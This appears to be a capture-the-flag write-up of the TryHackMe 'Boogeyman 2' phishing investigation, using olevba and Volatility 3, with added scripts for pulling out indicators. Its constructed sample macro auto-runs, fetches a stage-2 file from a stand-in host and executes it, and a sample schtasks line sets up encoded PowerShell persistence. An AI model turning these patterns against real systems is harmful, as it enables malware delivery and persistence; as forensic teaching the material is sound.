Boogeyman 2

Phishing Email and attachment Investigation

By Ren Sie

Refer to Boogeyman2 for the challenge room on TryHackMe

Artefacts

For the investigation, we will receive the following items:

  • A copy of the phishing email.
  • A memory dump of the victim's workstation.

Tools

Volatility 3: An open-source framework for extracting data from RAM samples.

Note: It may take a few minutes to process the memory dump and run plugins. For details, refer to the Volatility 3 documentation.

$ vol -f memorydump.raw <plugin>

Olevba: A tool for analyzing and extracting VBA macros from Microsoft Office documents, part of the Oletools suite.

$ olevba document.doc

Spear Phishing Human Resources

Maxine, an HR Specialist at Quick Logistics LLC, received an application for an open position. Unbeknownst to her, the attached resume was malicious and compromised her workstation.
The security team identified suspicious commands executed on Maxine's workstation, prompting an investigation. You are tasked with analyzing and assessing the impact of the compromise.

What email was used to send the phishing email?
The email address is in the header.

What is the email of the victim employee?
The receiving address is also in the header.

What is the name of the attached malicious document?
The attachment name is located at the bottom of the email.

What is the MD5 hash of the malicious attachment?
First, save the file to the local machine without opening it. Next, use the md5sum command to obtain the MD5 hash value of the file.

$ md5sum <attachment>

What URL is used to download the stage 2 payload based on the document's macro?
Since the question references the document's macro, use Olevba to identify its VBA macro functionality.

$ olevba <attachment>

Note: VBA macros are automated scripts written in Visual Basic for Applications that enable users to perform repetitive tasks and manipulate data in Microsoft Office applications.

After reviewing the output, I found the file path retrieved by the macro through an HTTP GET request.

What is the name of the process that executed the newly downloaded stage 2 payload?
Continuing to examine the script, we can identify the command that executes the malicious file, including the process name.

What is the full file path of the malicious stage 2 payload?
The full file path is also in the previous screenshot.
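The three macro questions above (download URL, the process that runs the stage 2 payload, and its full path) are all answered by reading the VBA that olevba prints. As an added example that is not part of the original writeup or the room, the script below pulls those indicators out of a macro listing automatically: it folds VBA string concatenation ("a" & "b"), inlines simple variable assignments, then extracts URLs, Windows paths and the command passed to Shell. The macro text, URL, path and script host in SAMPLE_MACRO are constructed for the example and are not the document analysed in the writeup.

```python
import re

# Constructed sample of what olevba prints for a document's VBA project. It is not
# the macro from the writeup: the URL, path and script host are made up, and the
# string concatenation stands in for the light obfuscation such macros often use.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String, p As String
    u = "http://" & "example" & ".invalid" & "/files/stage2.js"
    p = "C:\ProgramData\placeholder\" & "stage2.js"
    Call Fetch(u, p)
    Shell "wscript.exe " & p, vbHide
End Sub
'''

CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')   # "a" & "b"
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)        # name = "literal"
SHELL_CALL = re.compile(r'\bShell\s*\(?\s*"([^"]*)"')
URL = re.compile(r'https?://[^\s"\']+')
WINPATH = re.compile(r'[A-Za-z]:\\[^\s"\']+')
EXE = re.compile(r'\b[\w.-]+\.exe\b', re.IGNORECASE)


def fold_concats(src):
    # Merge adjacent string literals joined with & until nothing changes
    prev = None
    while prev != src:
        prev = src
        src = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


def inline_literals(src):
    # Naive constant propagation: substitute variables that hold a single string
    # literal into the lines that use them, then fold the resulting concatenations
    src = fold_concats(src)
    assigns = dict(ASSIGN.findall(src))
    out = []
    for line in src.splitlines():
        if ASSIGN.match(line) or re.match(r'\s*Dim\b', line):
            out.append(line)
            continue
        for name, val in assigns.items():
            line = re.sub(r'\b' + re.escape(name) + r'\b',
                          lambda m, v=val: '"' + v + '"', line)
        out.append(line)
    return fold_concats("\n".join(out))


def extract_indicators(macro_src):
    """Return the URLs, Windows paths, Shell commands and host executables a macro uses."""
    src = inline_literals(macro_src)
    commands = SHELL_CALL.findall(src)
    processes = [m.group(0) for c in commands for m in [EXE.search(c)] if m]
    return {
        "urls": list(dict.fromkeys(URL.findall(src))),
        "paths": list(dict.fromkeys(WINPATH.findall(src))),
        "commands": commands,
        "processes": list(dict.fromkeys(processes)),
    }


if __name__ == "__main__":
    for key, values in extract_indicators(SAMPLE_MACRO).items():
        print(f"{key}: {values}")
```

The substitution step is deliberately simple (it does not evaluate Chr() or StrReverse tricks), which is enough for concatenation-style obfuscation; for anything heavier, olevba's own --deobf option is the place to start.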

What is the PID of the process that executed the stage 2 payload?
To identify the process ID (PID), run Volatility with the pstree plugin against the memory dump of the affected machine. Since we already know which process ran the payload, we can pipe the output to grep for its name.

$ vol -f <memdump.raw> windows.pstree | grep -e 'process'

What is the parent PID of the process that executed the stage 2 payload?
The parent process ID (PPID) is printed in the column right after the PID, so it can also be read from the previous screenshot.

What URL is used to download the malicious binary executed by the stage 2 payload?
Since the stage 2 payload (update.js) downloads and executes the malicious binary, we should examine its source code. To do this, we first need to retrieve the file by locating its offset address in the memory dump. We will use the filescan plugin along with grep to find the offset address.

$ vol -f <memdump.raw> windows.filescan | grep -e 'update'

Once we have the offset address, we can use the dumpfiles plugin to extract the file.

$ vol -f <memdump.raw> windows.dumpfiles --virtaddr 0xe58f836edc60

After retrieving the file, open it using nano or any text editor. The screenshot of the content reveals the URL hosting the malicious binary (updater.exe).

$ nano file.dat

What is the PID of the malicious process used to establish the C2 connection?
To list the network connections recorded in the memory dump, use the netscan plugin along with grep to search for the malicious binary.

$ vol -f <memdump.raw> windows.netscan | grep -e 'updater.exe'

Alternatively, use the pstree plugin along with grep to find the malicious binary's PID.

$ vol -f <memdump.raw> windows.pstree | grep -e 'updater.exe'

What is the full file path of the malicious process used to establish the C2 connection?
We can use the filescan plugin along with the grep command to learn the file path.

$ vol -f <memdump.raw> windows.filescan | grep -e 'update'

What is the IP address and port of the C2 connection initiated by the malicious binary? (Format: IP address:port)
The IP address and port number come from the netscan output, the same command used earlier to find the PID of the C2 process.

$ vol -f <memdump.raw> windows.netscan | grep -e 'updater.exe'

What is the full file path of the malicious email attachment based on the memory dump?
Since we already have the file name, we can use the filescan plugin along with the grep command to learn the file path.

$ vol -f <memdump.raw> windows.filescan | grep -e 'Resume'
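The pstree, filescan and netscan steps above all follow the same pattern: run the plugin, grep for a name, read a column. As an added example that is not part of the original writeup, the script below parses Volatility 3's tab-separated output into rows so the PID and PPID of a process, the parent chain back to the Office process, the offsets of files matching a keyword, and the remote endpoints owned by a process can be pulled out programmatically instead of by eye. The three sample outputs are constructed: PIDs, offsets, addresses and the user path are made up (192.0.2.10 is a documentation address), and only the 0xe58f836edc60 offset is reused from the writeup's dumpfiles command.

```python
# Constructed samples of Volatility 3 output: a banner line, then a tab-separated
# header row, then rows. None of these values come from the real memory dump.
def _table(*rows):
    return "\n".join("\t".join(r) for r in rows)


PSTREE_SAMPLE = _table(
    ("Volatility 3 Framework 2.5.0",),
    ("PID", "PPID", "ImageFileName", "Offset(V)", "Threads", "Handles",
     "SessionId", "Wow64", "CreateTime", "ExitTime"),
    ("4", "0", "System", "0xe58f80e84040", "100", "-", "N/A", "False", "2023-08-21 14:00:00", "N/A"),
    ("3000", "2900", "explorer.exe", "0xe58f8300a080", "40", "-", "1", "False", "2023-08-21 14:05:00", "N/A"),
    ("* 4100", "3000", "WINWORD.EXE", "0xe58f8310b080", "20", "-", "1", "False", "2023-08-21 14:10:00", "N/A"),
    ("** 4200", "4100", "wscript.exe", "0xe58f8320c080", "5", "-", "1", "False", "2023-08-21 14:11:00", "N/A"),
    ("*** 4300", "4200", "updater.exe", "0xe58f8330d080", "8", "-", "1", "False", "2023-08-21 14:12:00", "N/A"),
)

FILESCAN_SAMPLE = _table(
    ("Volatility 3 Framework 2.5.0",),
    ("Offset", "Name", "Size"),
    ("0xe58f83600000", r"\Windows\System32\wscript.exe", "170496"),
    ("0xe58f836edc60", r"\Users\placeholder\AppData\Local\Temp\update.js", "2048"),
    ("0xe58f83800000", r"\Users\placeholder\AppData\Local\Temp\updater.exe", "73728"),
)

NETSCAN_SAMPLE = _table(
    ("Volatility 3 Framework 2.5.0",),
    ("Offset", "Proto", "LocalAddr", "LocalPort", "ForeignAddr", "ForeignPort",
     "State", "PID", "Owner", "Created"),
    ("0xe58f83500010", "TCPv4", "0.0.0.0", "445", "*", "0", "LISTENING", "4", "System", "2023-08-21 14:00:01"),
    ("0xe58f83500020", "TCPv4", "10.0.0.5", "49700", "10.0.0.2", "443", "ESTABLISHED", "3000", "explorer.exe", "2023-08-21 14:06:00"),
    ("0xe58f83500030", "TCPv4", "10.0.0.5", "49712", "192.0.2.10", "8080", "ESTABLISHED", "4300", "updater.exe", "2023-08-21 14:12:30"),
)


def parse_table(output, first_col):
    """Turn a Volatility 3 plugin's text output into a list of row dicts."""
    header, rows = None, []
    for line in output.splitlines():
        cells = [c.strip() for c in line.split("\t")]
        if header is None:
            if cells[0] == first_col:          # everything before the header is banner
                header = cells
            continue
        if len(cells) < len(header):           # blank, progress or warning lines
            continue
        cells[0] = cells[0].lstrip("* ")       # pstree prefixes depth markers to the PID
        rows.append(dict(zip(header, cells)))
    return rows


def find_process(pstree_out, name):
    """(PID, PPID) of the first process with this image name, or None."""
    for r in parse_table(pstree_out, "PID"):
        if r["ImageFileName"].lower() == name.lower():
            return int(r["PID"]), int(r["PPID"])
    return None


def ancestry(pstree_out, pid):
    """Image names from the given PID up to the root of the recorded tree."""
    by_pid = {int(r["PID"]): r for r in parse_table(pstree_out, "PID")}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["ImageFileName"])
        pid = int(by_pid[pid]["PPID"])
    return chain


def find_file_offsets(filescan_out, keyword):
    """(offset, path) pairs whose path contains the keyword; feed the offset to dumpfiles --virtaddr."""
    return [(r["Offset"], r["Name"]) for r in parse_table(filescan_out, "Offset")
            if keyword.lower() in r["Name"].lower()]


def find_remote_endpoints(netscan_out, owner):
    """Sorted 'ip:port' of outbound connections owned by the named process."""
    return sorted({f'{r["ForeignAddr"]}:{r["ForeignPort"]}'
                   for r in parse_table(netscan_out, "Offset")
                   if r["Owner"].lower() == owner.lower()
                   and r["ForeignAddr"] not in ("*", "0.0.0.0", "::")})


if __name__ == "__main__":
    print(find_process(PSTREE_SAMPLE, "updater.exe"), ancestry(PSTREE_SAMPLE, 4300))
    print(find_file_offsets(FILESCAN_SAMPLE, "update"))
    print(find_remote_endpoints(NETSCAN_SAMPLE, "updater.exe"))
```

To use it on a real dump, capture each plugin's output to a file (for example `vol -f memdump.raw windows.pstree > pstree.txt`) and pass the file contents to these functions; the ancestry chain is the quickest way to confirm that the C2 binary descends from the Office process that opened the attachment, which is the whole story of this compromise in one line.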

The attacker implanted a scheduled task right after establishing the C2 callback. What is the full command used by the attacker to maintain persistent access?
Since the question references a scheduled task, run the strings command over the memory dump and pipe the output to grep for the keyword "schtasks".

Note: schtasks is a command-line tool in Windows that allows users to create, delete, configure, or display scheduled tasks to automate running programs or scripts at specified times or events.

Note: The PowerShell script creates a scheduled task (Updater) that runs daily at 9:00 AM. It decodes and executes a base64-encoded string retrieved from the Windows registry, specifically from a key associated with the current user’s settings.
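The strings-and-grep step above finds the task creation command, but two details matter when reading the result: Windows keeps most command lines in memory as UTF-16LE, which plain `strings` skips unless told otherwise (`strings -el`), and the interesting part of the command is usually a base64 blob that still has to be decoded. As an added example that is not part of the original writeup, the script below does both over a constructed byte buffer: it extracts printable runs in ASCII and UTF-16LE, picks out `schtasks /create` command lines, parses the task name, schedule, start time and action, and decodes any base64 it finds, detecting the UTF-16LE wrapping PowerShell's -EncodedCommand uses. The task name Updater and the 09:00 start come from the writeup; the encoded payload is a harmless Write-Output, not the attacker's script, and the surrounding bytes are made up.

```python
import base64
import re

# Constructed memory-image fragment: junk bytes around one schtasks command line,
# stored once as ASCII and once as UTF-16LE. The encoded command is a harmless
# Write-Output stand-in, not the script recovered in the writeup.
ENCODED = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_CMD = ('schtasks /create /tn Updater /sc daily /st 09:00 '
              f'/tr "powershell -NoProfile -EncodedCommand {ENCODED}"')
MEMORY_SAMPLE = (b"\x00" * 16 + b"\x7f\x01\x02" + SAMPLE_CMD.encode("ascii")
                 + b"\x00\xff" * 8 + "explorer.exe".encode("utf-16-le") + b"\x00\x00"
                 + SAMPLE_CMD.encode("utf-16-le") + b"\x00" * 4)

SCHTASKS = re.compile(r"schtasks(?:\.exe)?\s+/create\b.*", re.IGNORECASE)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')            # quoted argument or bare word
B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")      # long base64-looking runs


def strings_ascii(blob, min_len=8):
    # Same idea as the strings command: runs of printable ASCII of at least min_len
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def strings_utf16le(blob, min_len=8):
    # Equivalent of strings -el; plain strings misses UTF-16LE command lines entirely
    return [m.group().decode("utf-16-le")
            for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob)]


def decode_blob(b64):
    """Decode base64; if the bytes look like UTF-16LE (as -EncodedCommand uses), decode as such."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def parse_schtasks(cmdline):
    """Split a schtasks /create line into its task name, schedule, start time and action."""
    tokens = [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]
    opts = {}
    for i, tok in enumerate(tokens):
        if tok.startswith("/") and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            opts[tok[1:].lower()] = tokens[i + 1]
    action = opts.get("tr", "")
    decoded = [d for d in (decode_blob(b) for b in B64.findall(action)) if d]
    return {"task": opts.get("tn"), "schedule": opts.get("sc"), "start": opts.get("st"),
            "action": action, "decoded": decoded, "raw": cmdline}


def find_scheduled_tasks(blob):
    """What `strings memdump.raw | grep schtasks` surfaces, with both encodings covered."""
    hits = []
    for s in strings_ascii(blob) + strings_utf16le(blob):
        for m in SCHTASKS.finditer(s):
            hits.append(parse_schtasks(m.group()))
    return hits


if __name__ == "__main__":
    for task in find_scheduled_tasks(MEMORY_SAMPLE):
        print(task["task"], task["schedule"], task["start"], task["decoded"])
```

On a real image, read the dump with `open(path, "rb").read()` (or scan it in chunks) in place of MEMORY_SAMPLE. The decoded script is where the registry lookup the note above describes would appear, so the `decoded` field is the one to inspect next; if the task runs a file rather than an inline command, the `action` path is what to go back to filescan and dumpfiles for.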
